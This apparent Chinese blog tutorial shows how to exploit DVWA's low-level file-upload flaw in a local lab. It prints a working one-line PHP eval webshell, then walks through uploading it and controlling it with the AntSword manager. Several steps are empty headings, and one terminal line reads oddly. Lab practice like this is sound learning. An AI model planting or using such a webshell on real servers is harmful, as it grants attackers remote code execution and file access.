中国蚁剑使用
使用phpstudy搭建的dvwa靶场,测试文件上传漏洞 low级别。
1、准备php木马文件,命名为up.php
<?php
eval($_POST['abc']);
?>
2、phpstudy启动,dvwa登录,置为low级别
3、上传up.php
4、浏览器访问上传的php文件,未报404,说明访问成功
5、启动中国蚁剑exe,在主面板右键菜单栏选择添加数据。弹窗中配置连接信息
6、配置
其他设置
7、测试和添加
8、利用
虚拟终端:ret是子程序的返回指令执行本指令
文件管理:
数据操作:
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 没有源码,如何修改代码逻辑?
· PowerShell开发游戏 · 打蜜蜂
· 在鹅厂做java开发是什么体验
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战